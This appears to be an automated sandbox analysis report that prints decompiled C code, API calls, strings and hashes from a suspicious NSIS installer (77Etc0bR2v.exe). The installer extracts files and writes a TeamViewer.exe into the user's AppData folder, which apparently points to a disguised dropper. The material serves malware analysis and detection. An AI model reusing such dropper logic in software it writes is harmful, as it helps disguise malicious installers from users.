                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E004036AF() {
				intOrPtr _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t27;
				int _t30;
				void* _t33;
				struct HINSTANCE__* _t36;
				int _t37;
				int _t41;
				char* _t61;
				CHAR* _t73;
				intOrPtr _t75;
				CHAR* _t80;

				_t75 =  *0x423eb0;
				_t20 = E00405E88(6);
				_t82 = _t20;
				if(_t20 == 0) {
					_t73 = 0x4204a0;
					"1033" = 0x7830;
					E00405A4D(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x4204a0, 0);
					__eflags =  *0x4204a0;
					if(__eflags == 0) {
						E00405A4D(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x4204a0, 0);
					}
					_push(_t73);
					_push("1033");
					L00405B82();
				} else {
					E00405AC4("1033",  *_t20() & 0x0000ffff);
				}
				E00403978(_t70, _t82);
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				 *0x423f3c = 0x10000;
				if(E0040573A(_t82, 0x429400) != 0) {
					L16:
					if(E0040573A(_t90, 0x429400) == 0) {
						E00405B88(0, _t73, _t75, 0x429400,  *((intOrPtr*)(_t75 + 0x118)));
					}
					_t27 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t27;
					if( *((intOrPtr*)(_t75 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							E00403978(_t70, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_push(0);
								_t30 = E00404FD6();
								__eflags = _t30;
								if(_t30 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420478, 5);
							_t36 = LoadLibraryA("RichEd20");
							__eflags = _t36;
							if(_t36 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t80 = "RichEdit20A";
							_t37 = GetClassInfoA(0, _t80, 0x423640);
							__eflags = _t37;
							if(_t37 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t80;
								RegisterClassA(0x423640);
							}
							_t41 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403A45, 0);
							E004035FF(E0040140B(5), 1);
							return _t41;
						}
						L22:
						_t33 = 2;
						return _t33;
					} else {
						_t70 =  *0x423ea0;
						 *0x423654 = _t27;
						_v28 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v28;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v24; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420478 = CreateWindowExA(0x80,  &_v28, 0, 0x80000000, _v24, _v20, _v16 - _v24, _v12 - _v20, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t70 =  *(_t75 + 0x48);
					if(_t70 == 0) {
						goto L16;
					}
					_t73 = 0x422e40;
					E00405A4D( *((intOrPtr*)(_t75 + 0x44)), _t70,  *((intOrPtr*)(_t75 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x20
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t73 = 0x422e41;
						_t61 = E00405684(0x422e41, 0x22);
						 *_t61 = 0;
					}
					_push(_t73);
					L00405B7C();
					_t62 = _t61 + _t73 - 4;
					if(_t62 <= _t73) {
						L15:
						E00405B66(0x429400, E00405659(_t62, _t73));
						goto L16;
					} else {
						_push(".exe");
						_push(_t62);
						if( *0x4070f0() != 0) {
							goto L15;
						}
						_t62 = GetFileAttributesA(_t73);
						if(_t62 == 0xffffffff) {
							L14:
							_t62 = E004056A0(_t62, _t73);
							goto L15;
						}
						_t90 = _t62 & 0x00000010;
						if((_t62 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}






















                                                                                                                        0x004036b5
                                                                                                                        0x004036be
                                                                                                                        0x004036c5
                                                                                                                        0x004036c7
                                                                                                                        0x004036db
                                                                                                                        0x004036ed
                                                                                                                        0x004036f7
                                                                                                                        0x004036fc
                                                                                                                        0x00403702
                                                                                                                        0x00403715
                                                                                                                        0x00403715
                                                                                                                        0x0040371a
                                                                                                                        0x0040371b
                                                                                                                        0x00403720
                                                                                                                        0x004036c9
                                                                                                                        0x004036d4
                                                                                                                        0x004036d4
                                                                                                                        0x00403725
                                                                                                                        0x00403738
                                                                                                                        0x0040373d
                                                                                                                        0x0040374e
                                                                                                                        0x004037d5
                                                                                                                        0x004037dd
                                                                                                                        0x004037e6
                                                                                                                        0x004037e6
                                                                                                                        0x004037fc
                                                                                                                        0x00403802
                                                                                                                        0x00403810
                                                                                                                        0x0040389f
                                                                                                                        0x004038a7
                                                                                                                        0x004038b1
                                                                                                                        0x004038b6
                                                                                                                        0x004038bc
                                                                                                                        0x00403945
                                                                                                                        0x00403946
                                                                                                                        0x0040394b
                                                                                                                        0x0040394d
                                                                                                                        0x00403969
                                                                                                                        0x00000000
                                                                                                                        0x00403969
                                                                                                                        0x0040394f
                                                                                                                        0x00403955
                                                                                                                        0x0040395d
                                                                                                                        0x0040395d
                                                                                                                        0x00000000
                                                                                                                        0x00403955
                                                                                                                        0x004038ca
                                                                                                                        0x004038db
                                                                                                                        0x004038dd
                                                                                                                        0x004038df
                                                                                                                        0x004038e6
                                                                                                                        0x004038e6
                                                                                                                        0x004038ee
                                                                                                                        0x004038f6
                                                                                                                        0x004038f8
                                                                                                                        0x004038fa
                                                                                                                        0x00403903
                                                                                                                        0x00403906
                                                                                                                        0x0040390c
                                                                                                                        0x0040390c
                                                                                                                        0x0040392b
                                                                                                                        0x0040393c
                                                                                                                        0x00000000
                                                                                                                        0x00403941
                                                                                                                        0x004038a9
                                                                                                                        0x004038ab
                                                                                                                        0x00000000
                                                                                                                        0x00403816
                                                                                                                        0x00403816
                                                                                                                        0x0040381c
                                                                                                                        0x00403826
                                                                                                                        0x0040382e
                                                                                                                        0x00403838
                                                                                                                        0x0040383e
                                                                                                                        0x0040384c
                                                                                                                        0x0040396e
                                                                                                                        0x0040396e
                                                                                                                        0x00000000
                                                                                                                        0x0040396e
                                                                                                                        0x00403852
                                                                                                                        0x0040385b
                                                                                                                        0x0040389a
                                                                                                                        0x00000000
                                                                                                                        0x0040389a
                                                                                                                        0x00403754
                                                                                                                        0x00403754
                                                                                                                        0x00403759
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403763
                                                                                                                        0x00403773
                                                                                                                        0x00403778
                                                                                                                        0x0040377f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403783
                                                                                                                        0x00403785
                                                                                                                        0x0040378d
                                                                                                                        0x00403792
                                                                                                                        0x00403792
                                                                                                                        0x00403794
                                                                                                                        0x00403795
                                                                                                                        0x0040379a
                                                                                                                        0x004037a0
                                                                                                                        0x004037c8
                                                                                                                        0x004037d0
                                                                                                                        0x00000000
                                                                                                                        0x004037a2
                                                                                                                        0x004037a2
                                                                                                                        0x004037a7
                                                                                                                        0x004037b0
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004037b3
                                                                                                                        0x004037bc
                                                                                                                        0x004037c2
                                                                                                                        0x004037c3
                                                                                                                        0x00000000
                                                                                                                        0x004037c3
                                                                                                                        0x004037be
                                                                                                                        0x004037c0
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004037c0
                                                                                                                        0x004037a0

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                                          • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                                          • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                                        • lstrcat.KERNEL32(1033,004204A0), ref: 00403720
                                                                                                                        • lstrlen.KERNEL32( "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe",?,?,?, "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe",00000000,00429400,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\77Etc0bR2v.exe" ), ref: 00403795
                                                                                                                        • lstrcmpi.KERNEL32 ref: 004037A8
                                                                                                                        • GetFileAttributesA.KERNEL32( "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe"), ref: 004037B3
                                                                                                                        • LoadImageA.USER32 ref: 004037FC
                                                                                                                          • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                                                        • RegisterClassA.USER32 ref: 00403843
                                                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040385B
                                                                                                                        • CreateWindowExA.USER32 ref: 00403894
                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 004038CA
                                                                                                                        • LoadLibraryA.KERNEL32(RichEd20), ref: 004038DB
                                                                                                                        • LoadLibraryA.KERNEL32(RichEd32), ref: 004038E6
                                                                                                                        • GetClassInfoA.USER32 ref: 004038F6
                                                                                                                        • GetClassInfoA.USER32 ref: 00403903
                                                                                                                        • RegisterClassA.USER32 ref: 0040390C
                                                                                                                        • DialogBoxParamA.USER32 ref: 0040392B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe"$"C:\Users\user\Desktop\77Etc0bR2v.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                        • API String ID: 914957316-2836006257
                                                                                                                        • Opcode ID: 1f1367b372de5d4c513f4d159d02d8cf4d09cbf7b54f42e698bf1387707a820a
                                                                                                                        • Instruction ID: 5edcd83abe1923a5ef33726047749e404321c8c293ca1ea02831498dc8d0bb6f
                                                                                                                        • Opcode Fuzzy Hash: 1f1367b372de5d4c513f4d159d02d8cf4d09cbf7b54f42e698bf1387707a820a
                                                                                                                        • Instruction Fuzzy Hash: A961A3B16442007FD720AF659D45E2B3AADEB4475AF40457FF940B22E1D77CAD01CA2E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402C72, Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 203memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 96%
                                                                                                                        			E00402C72(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				long _t82;
				void* _t83;
				signed int _t89;
				intOrPtr _t92;
				void* _t101;
				signed int _t103;
				void* _t105;
				long _t106;
				long _t109;
				intOrPtr* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\77Etc0bR2v.exe", 0x400);
				_t105 = E0040583D("C:\\Users\\engineer\\Desktop\\77Etc0bR2v.exe", 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405B66(0x42b000, E004056A0(E00405B66("C:\\Users\\engineer\\Desktop", "C:\\Users\\engineer\\Desktop\\77Etc0bR2v.exe"), "C:\\Users\\engineer\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				 *0x41f050 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BD3(1);
					if( *0x423eb4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t110 = GlobalAlloc(0x40, _v20);
						E00405F62(0x40afb8);
						E0040586C( &_v300, "C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031F1( *0x423eb4 + 0x1c);
							 *0x41f054 = _t65;
							 *0x417048 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F18(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
								} while (_t101 != 0);
								_t71 =  *0x417044; // 0x4e5277
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E004057FE(0x423ec0, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031F1( *0x417040);
					if(E004031BF( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031BF(0x417050, _t106); // executed
						if(_t83 == 0) {
							E00402BD3(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423eb4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BD3(0);
							}
							goto L19;
						}
						E004057FE( &_v40, 0x417050, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							_t103 =  *0x417040; // 0x0
							 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x423eb4 = _t103;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x41f050) {
							_v8 = E00405EF4(_v8, 0x417050, _t106);
						}
						 *0x417040 =  *0x417040 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 > 0);
					goto L22;
				}
			}





























                                                                                                                        0x00402c80
                                                                                                                        0x00402c83
                                                                                                                        0x00402c9d
                                                                                                                        0x00402ca2
                                                                                                                        0x00402cb5
                                                                                                                        0x00402cba
                                                                                                                        0x00402cc0
                                                                                                                        0x00000000
                                                                                                                        0x00402cc2
                                                                                                                        0x00402ce4
                                                                                                                        0x00402ceb
                                                                                                                        0x00402cf3
                                                                                                                        0x00402cf8
                                                                                                                        0x00402cfa
                                                                                                                        0x00402dea
                                                                                                                        0x00402dec
                                                                                                                        0x00402df8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00402e01
                                                                                                                        0x00402e2d
                                                                                                                        0x00402e3d
                                                                                                                        0x00402e3f
                                                                                                                        0x00402e50
                                                                                                                        0x00402e6b
                                                                                                                        0x00402e74
                                                                                                                        0x00402e79
                                                                                                                        0x00402e98
                                                                                                                        0x00402ea8
                                                                                                                        0x00402eba
                                                                                                                        0x00402ebf
                                                                                                                        0x00402ec7
                                                                                                                        0x00402ed4
                                                                                                                        0x00402edc
                                                                                                                        0x00402ee1
                                                                                                                        0x00402ee3
                                                                                                                        0x00402ee3
                                                                                                                        0x00402eeb
                                                                                                                        0x00402eeb
                                                                                                                        0x00402eee
                                                                                                                        0x00402eef
                                                                                                                        0x00402eef
                                                                                                                        0x00402ef2
                                                                                                                        0x00402ef4
                                                                                                                        0x00402ef4
                                                                                                                        0x00402ef7
                                                                                                                        0x00402efe
                                                                                                                        0x00402f0a
                                                                                                                        0x00000000
                                                                                                                        0x00402f0f
                                                                                                                        0x00000000
                                                                                                                        0x00402ec7
                                                                                                                        0x00000000
                                                                                                                        0x00402e7b
                                                                                                                        0x00402e09
                                                                                                                        0x00402e1b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00402d00
                                                                                                                        0x00402d00
                                                                                                                        0x00402d05
                                                                                                                        0x00402d09
                                                                                                                        0x00402d10
                                                                                                                        0x00402d17
                                                                                                                        0x00402d19
                                                                                                                        0x00402d19
                                                                                                                        0x00402d21
                                                                                                                        0x00402d28
                                                                                                                        0x00402e87
                                                                                                                        0x00402ec9
                                                                                                                        0x00000000
                                                                                                                        0x00402ec9
                                                                                                                        0x00402d34
                                                                                                                        0x00402db8
                                                                                                                        0x00402dbb
                                                                                                                        0x00402dc0
                                                                                                                        0x00000000
                                                                                                                        0x00402db8
                                                                                                                        0x00402d41
                                                                                                                        0x00402d46
                                                                                                                        0x00402d4e
                                                                                                                        0x00402d74
                                                                                                                        0x00402d7a
                                                                                                                        0x00402d83
                                                                                                                        0x00402d89
                                                                                                                        0x00402d8e
                                                                                                                        0x00402d94
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00402d9e
                                                                                                                        0x00402da6
                                                                                                                        0x00402da9
                                                                                                                        0x00402dae
                                                                                                                        0x00402db0
                                                                                                                        0x00402db0
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00402d9e
                                                                                                                        0x00402dc1
                                                                                                                        0x00402dc7
                                                                                                                        0x00402dd7
                                                                                                                        0x00402dd7
                                                                                                                        0x00402dda
                                                                                                                        0x00402de0
                                                                                                                        0x00402de2
                                                                                                                        0x00000000
                                                                                                                        0x00402d00

                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402C86
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\77Etc0bR2v.exe,00000400), ref: 00402CA2
                                                                                                                          • Part of subcall function 0040583D: GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\77Etc0bR2v.exe,80000000,00000003), ref: 00405841
                                                                                                                          • Part of subcall function 0040583D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\77Etc0bR2v.exe,C:\Users\user\Desktop\77Etc0bR2v.exe,80000000,00000003), ref: 00402CEB
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00409130), ref: 00402E32
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C72, 00402E4A
                                                                                                                        • C:\Users\user\Desktop\77Etc0bR2v.exe, xrefs: 00402C8C, 00402C9B, 00402CAF, 00402CCC
                                                                                                                        • soft, xrefs: 00402D62
                                                                                                                        • wRN, xrefs: 00402EF7
                                                                                                                        • Null, xrefs: 00402D6B
                                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EC9
                                                                                                                        • Error launching installer, xrefs: 00402CC2
                                                                                                                        • "C:\Users\user\Desktop\77Etc0bR2v.exe" , xrefs: 00402C7F
                                                                                                                        • C:\Users\user\Desktop, xrefs: 00402CCD, 00402CD2, 00402CD8
                                                                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E7B
                                                                                                                        • Inst, xrefs: 00402D59
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                        • String ID: "C:\Users\user\Desktop\77Etc0bR2v.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\77Etc0bR2v.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$wRN
                                                                                                                        • API String ID: 2803837635-3126812384
                                                                                                                        • Opcode ID: 6147c8ce7f916bf316bc462c049502f5517c6654920939d23064a14b970bc3fe
                                                                                                                        • Instruction ID: 0b72a330c31c6d4d52753dad6a5c3012229d4666e6dae103a7747cbc92612fb8
                                                                                                                        • Opcode Fuzzy Hash: 6147c8ce7f916bf316bc462c049502f5517c6654920939d23064a14b970bc3fe
                                                                                                                        • Instruction Fuzzy Hash: B761E231A40215ABDB20DF64DE49B9E7BB4EB04315F20407BF904B62D2D7BC9E458B9C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401734, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147stringtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 73%
                                                                                                                        			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t40;
				void* _t42;
				FILETIME* _t48;
				FILETIME* _t60;
				void* _t62;
				signed int _t68;
				FILETIME* _t69;
				FILETIME* _t73;
				signed int _t75;
				void* _t78;
				intOrPtr _t80;
				void* _t83;

				_t73 = __ebx;
				_t80 = E004029F6(0x31);
				 *((intOrPtr*)(_t83 - 8)) = _t80;
				 *(_t83 + 8) =  *(_t83 - 0x24) & 0x00000007;
				_t33 = E004056C6(_t80);
				_push(_t80);
				if(_t33 == 0) {
					_push(E00405659(E00405B66(0x409b70, "C:\\Users\\engineer\\AppData\\Roaming\\TeamViewer"), _t34));
					L00405B82();
				} else {
					_push(0x409b70);
					__eax = E00405B66();
				}
				E00405DC8(0x409b70);
				while(1) {
					__eflags =  *(_t83 + 8) - 3;
					if( *(_t83 + 8) >= 3) {
						_t62 = E00405E61(0x409b70);
						_t75 = 0;
						__eflags = _t62 - _t73;
						if(_t62 != _t73) {
							_t69 = _t62 + 0x14;
							__eflags = _t69;
							_t75 = CompareFileTime(_t69, _t83 - 0x18);
						}
						asm("sbb eax, eax");
						_t68 =  ~(( *(_t83 + 8) + 0xfffffffd | 0x80000000) & _t75) + 1;
						__eflags = _t68;
						 *(_t83 + 8) = _t68;
					}
					__eflags =  *(_t83 + 8) - _t73;
					if( *(_t83 + 8) == _t73) {
						E0040581E(0x409b70);
					}
					__eflags =  *(_t83 + 8) - 1;
					_t40 = E0040583D(0x409b70, 0x40000000, (0 |  *(_t83 + 8) != 0x00000001) + 1);
					__eflags = _t40 - 0xffffffff;
					 *(_t83 - 0x34) = _t40;
					if(_t40 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t83 + 8) - _t73;
					if( *(_t83 + 8) != _t73) {
						E00404F04(0xffffffe2,  *((intOrPtr*)(_t83 - 8)));
						__eflags =  *(_t83 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t83 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t83 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405B66(0x40a370, 0x424000);
						E00405B66(0x424000, 0x409b70);
						E00405B88(_t73, 0x40a370, 0x409b70, " "C:\Users\engineer\AppData\Roaming\TeamViewer\TeamViewer.exe"",  *((intOrPtr*)(_t83 - 0x10)));
						E00405B66(0x424000, 0x40a370);
						_t60 = E00405427(" "C:\Users\engineer\AppData\Roaming\TeamViewer\TeamViewer.exe"",  *(_t83 - 0x24) >> 3) - 4;
						__eflags = _t60;
						if(_t60 == 0) {
							continue;
						} else {
							__eflags = _t60 == 1;
							if(_t60 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t48 = 0;
								__eflags = 0;
							} else {
								_push(0x409b70);
								_push(0xfffffffa);
								E00404F04();
								L29:
								_t48 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t48;
				}
				E00404F04(0xffffffea,  *((intOrPtr*)(_t83 - 8)));
				 *0x423f54 =  *0x423f54 + 1;
				_t42 = E00402F18(_t75,  *((intOrPtr*)(_t83 - 0x1c)),  *(_t83 - 0x34), _t73, _t73); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t83 - 0x18) - 0xffffffff;
				_t78 = _t42;
				if( *(_t83 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t83 - 0x34), _t83 - 0x18, _t73, _t83 - 0x18);
				} else {
					__eflags =  *((intOrPtr*)(_t83 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t83 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t83 - 0x34)); // executed
				__eflags = _t78 - _t73;
				if(_t78 >= _t73) {
					goto L31;
				} else {
					__eflags = _t78 - 0xfffffffe;
					if(_t78 != 0xfffffffe) {
						E00405B88(_t73, _t78, 0x409b70, 0x409b70, 0xffffffee);
					} else {
						E00405B88(_t73, _t78, 0x409b70, 0x409b70, 0xffffffe9);
						_push( *((intOrPtr*)(_t83 - 8)));
						_push(0x409b70);
						L00405B82();
					}
					_push(0x200010);
					_push(0x409b70);
					E00405427();
					goto L29;
				}
				goto L33;
			}
















                                                                                                                        0x00401734
                                                                                                                        0x0040173b
                                                                                                                        0x00401744
                                                                                                                        0x00401747
                                                                                                                        0x0040174a
                                                                                                                        0x0040174f
                                                                                                                        0x00401757
                                                                                                                        0x00401772
                                                                                                                        0x00401773
                                                                                                                        0x00401759
                                                                                                                        0x00401759
                                                                                                                        0x0040175a
                                                                                                                        0x0040175a
                                                                                                                        0x00401779
                                                                                                                        0x00401783
                                                                                                                        0x00401783
                                                                                                                        0x00401787
                                                                                                                        0x0040178a
                                                                                                                        0x0040178f
                                                                                                                        0x00401791
                                                                                                                        0x00401793
                                                                                                                        0x00401798
                                                                                                                        0x00401798
                                                                                                                        0x004017a3
                                                                                                                        0x004017a3
                                                                                                                        0x004017b4
                                                                                                                        0x004017b6
                                                                                                                        0x004017b6
                                                                                                                        0x004017b7
                                                                                                                        0x004017b7
                                                                                                                        0x004017ba
                                                                                                                        0x004017bd
                                                                                                                        0x004017c0
                                                                                                                        0x004017c0
                                                                                                                        0x004017c7
                                                                                                                        0x004017d6
                                                                                                                        0x004017db
                                                                                                                        0x004017de
                                                                                                                        0x004017e1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004017e3
                                                                                                                        0x004017e6
                                                                                                                        0x00401840
                                                                                                                        0x00401845
                                                                                                                        0x004015a8
                                                                                                                        0x0040265c
                                                                                                                        0x0040265c
                                                                                                                        0x0040288b
                                                                                                                        0x0040288e
                                                                                                                        0x0040288e
                                                                                                                        0x00000000
                                                                                                                        0x004017e8
                                                                                                                        0x004017ee
                                                                                                                        0x004017f9
                                                                                                                        0x00401806
                                                                                                                        0x00401811
                                                                                                                        0x00401827
                                                                                                                        0x00401827
                                                                                                                        0x0040182a
                                                                                                                        0x00000000
                                                                                                                        0x00401830
                                                                                                                        0x00401830
                                                                                                                        0x00401831
                                                                                                                        0x0040184e
                                                                                                                        0x00402894
                                                                                                                        0x00402894
                                                                                                                        0x00402894
                                                                                                                        0x00401833
                                                                                                                        0x00401833
                                                                                                                        0x00401834
                                                                                                                        0x00401492
